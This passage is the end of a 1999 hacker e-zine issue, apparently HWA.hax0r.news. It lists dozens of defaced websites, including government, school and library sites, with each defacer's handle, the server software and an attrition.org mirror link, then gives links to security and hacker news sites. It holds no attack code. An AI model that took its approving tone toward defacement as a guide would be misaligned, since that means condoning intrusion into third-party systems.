Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/shjlib.gov.ae
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/12/99

Defaced domain: www.koko.gov.my
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.koko.gov.my
Defaced by: dukj
Operating System: Windows NT
Date 11/12/99

Defaced domain: www.dewa.gov.ae
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.dewa.gov.ae
Defaced by: dukj
Operating System: Windows NT
Date 11/12/99

Defaced domain: www.do-it-better.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.do-it-better.com
Defaced by: Fuby
Operating System: Windows NT
Date 11/12/99

Defaced domain: www.hyd.gov.hk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.hyd.gov.hk
Defaced by: dukj
Operating System: Windows NT
Date 11/12/99

Defaced domain: www.aodc.gov.au
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.aodc.gov.au
Defaced by: ALOC
Operating System: Solaris
Date 11/12/99

Defaced domain: athena.infopreneur.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/athena.infopreneur.com
Defaced by: Blade
Operating System: Windows NT
Date 11/12/99

Defaced domain: www.cmiteamwork.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.cmiteamwork.com
Defaced by: v00d00
Operating System: Windows NT
Date 11/12/99

Defaced domain: www.shssf.edu.tw
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.shssf.edu.tw
Defaced by: TREATY
Operating System: Solaris
Date 11/12/99

Defaced domain: www.hkl.gov.my
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.hkl.gov.my
Defaced by: TREATY
Operating System: Solaris
Date 11/12/99

Defaced domain: caetano.fenorte.uenf.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/caetano.fenorte.uenf.br
Defaced by: r4ideN
Operating System: Linux (Apache 1.2.4)
Date 11/12/99

Defaced domain: fusion.sci.hiroshima-u.ac.jp
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/fusion.sci.hiroshima-u.ac.jp
Operating System: Solaris
Date 11/13/99

Defaced domain: eo1.gsfc.nasa.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/eo1.gsfc.nasa.gov
Defaced by: Verb0
Operating System: Windows NT
Date 11/13/99

Defaced domain: www.aptv.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/www.aptv.org
Defaced by: busdr1v3r
Operating System: Irix
Date 11/13/99

Defaced domain: www.pgj.ma.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/www.pgj.ma.gov.br
Defaced by: NFO
Operating System: Windows NT
Date 11/14/99

Defaced domain: www.ipem.mg.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/www.ipem.mg.gov.br
Defaced by: NFO
Operating System: Windows NT
Date 11/14/99

Defaced domain: www.sect.mg.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/www.sect.mg.gov.br
Defaced by: NFO
Operating System: Windows NT
Date 11/14/99

Defaced domain: www.wnym.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.wnym.com
Defaced by: Chaos Crew
Operating System: Linux (Netscape-FastTrack/2.01)
Date 11/14/99

Defaced domain: www.duqpart.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.duqpart.com
Defaced by: Chaos Inc.
Operating System: Linux (Netscape-FastTrack/2.01)
Date 11/14/99

Defaced domain: www.bengarelick.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.bengarelick.com
Defaced by: darkness
Operating System: Linux (Netscape-FastTrack/2.01)
Date 11/14/99

Defaced domain: www.unitedskins.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.unitedskins.com
Defaced by: SunDevil
Operating System: Windows NT
Date 11/14/99

Defaced domain: www.greenelec.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.greenelec.com
Defaced by: wkD
Operating System: Linux
Date 11/14/99

Defaced domain: www.cwc.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.cwc.gov
Defaced by: Coolio
Operating System: Linux
Date 11/14/99

Defaced domain: www.syokubutu.rika.juen.ac.jp
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.syokubutu.rika.juen.ac.jp
Defaced by: DHC
Operating System: Windows 95
Date 11/14/99

Defaced domain: www.dare.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.dare.com
Defaced by: Coolio
Operating System: Irix
Date 11/14/99

Defaced domain: www.dairyqueen.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.dairyqueen.com
Defaced by: Beyond
Operating System: Windows NT
Date 11/14/99

Defaced domain: www.hyd.gov.hk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.hyd.gov.hk
Defaced by: Beyond
Operating System: Windows NT
Date 11/14/99

Defaced domain: www.europa.aichi-edu.ac.jp
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.europa.aichi-edu.ac.jp
Defaced by: Code Kings
Operating System: Windows 95
Date 11/14/99

Defaced domain: www.acss.com.tw
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.acss.com.tw
Defaced by: DHC
Operating System: Windows NT
Date 11/14/99

Defaced domain: www.trucktrack.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.trucktrack.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99

Defaced domain: www.bjrc.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.bjrc.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99

Defaced domain: www.advancedwireless.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.advancedwireless.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99

Defaced domain: www.spartafoods.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.spartafoods.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99

Defaced domain: www.matept.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.matept.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99

Defaced domain: www.flopz.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.flopz.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99

Defaced domain: www.mncoop.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.mncoop.org
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99

Defaced domain: www.babybook.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.babybook.net
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99

Defaced domain: www.microassist.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.microassist.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99

Defaced domain: www.cdcs.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.cdcs.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99

Defaced domain: www.wed.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.wed.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99

Defaced domain: goffstown.lib.nh.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/goffstown.lib.nh.us
Defaced by: hacking 4 ponies
Operating System: Linux (Apache 1.2.4)
Date 11/14/99

Defaced domain: bectraining.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/bectraining.com
Defaced by: hacking 4 ponies
Operating System: Linux (Apache 1.2.4)
Date 11/14/99

Defaced domain: www.adc-electronic.de
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.adc-electronic.de
Operating System: Solaris 2.6 - 2.7 (Apache 1.2.6)
Date 11/14/99

Defaced domain: hooksett.lib.nh.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/hooksett.lib.nh.us
Defaced by: hacking 4 ponies
Operating System: Linux (Apache 1.2.4)
Date 11/14/99

Defaced domain: seresc.k12.nh.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/seresc.k12.nh.us
Defaced by: hacking 4 ponies
Operating System: Linux (Apache 1.2.4)
Date 11/14/99

Defaced domain: litchfield.k12.nh.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/litchfield.k12.nh.us
Defaced by: Hacking 4 Ponies
Operating System: Linux (Apache 1.2.4)
Date 11/14/99

Defaced domain: www.7thheaven.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.7thheaven.org
Defaced by: NitrOBurN
Operating System: Linux (Apache 1.3.4)
Date 11/14/99

Defaced domain: www.mv2000.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.mv2000.com
Defaced by: darkness
Operating System: Linux (Apache 1.3.6)
Date 11/14/99

Defaced domain: www.bellcity.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.bellcity.net
Defaced by: darkness
Operating System: Linux (Apache 1.3.6)
Date 11/14/99

Defaced domain: www.ntia.doc.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.ntia.doc.gov
Defaced by: Comdext0r
Operating System: Windows NT (WebSitePro/1.1f)
Date 11/14/99

Defaced domain: www.clearvista.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.clearvista.com
Defaced by: spinkus
Operating System: Windows NT (IIS/4.0)
Date 11/14/99

and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed

Belgium.......: http://securax.org/cum/ *New address*

Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net

Canada .......: http://www.hackcanada.com

Croatia.......: http://security.monitor.hr

Columbia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net

Finland ........http://hackunlimited.com/

Germany ........http://www.alldas.de/
                http://www.security-news.com/

Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/

Netherlands...: http://security.pine.nl/

Russia........: http://www.tsu.ru/~eugene/

Singapore.....: http://www.icepoint.com

South Africa ...http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net

Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.

.za (South Africa) sites contributed by wyzwun tnx guy...

Got a link for this section? email it to hwa@press.usmc.net and I'll review it and post it here if it merits it.
@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]